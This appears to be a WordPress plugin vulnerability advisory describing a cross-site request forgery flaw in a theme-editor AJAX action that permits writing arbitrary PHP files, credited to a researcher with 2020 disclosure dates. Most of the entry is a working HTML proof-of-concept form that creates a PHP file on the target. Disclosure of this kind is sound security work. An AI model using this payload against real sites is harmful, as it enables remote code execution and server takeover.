This flaw gave attackers the ability to forge requests on behalf of an administrator in order to modify arbitrary theme files and create new PHP files, which could allow an attacker to achieve remote code execution (RCE) on a vulnerable site’s server.
The following will create hello.php in the /twentytwenty theme directory. You can just swap out sub_cmd and theme files for the other AJAX actions. <html> <body> <form action="http://URL/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="theme_2" value="twentytwenty" /> <input type="hidden" name="theme_2_file" value="hello.php" /> <input type="hidden" name="theme_2_file_contents" value="<?php phpinfo();?>" /> <input type="hidden" name="theme_2_new_file" value="" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="action" value="orbisius_ctc_theme_editor_ajax" /> <input type="hidden" name="sub_cmd" value="save_file" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Chloe Chamberland
Chloe Chamberland
No
2020-10-14 (about 2 years ago)
2020-10-14 (about 2 years ago)
2020-11-17 (about 2 years ago)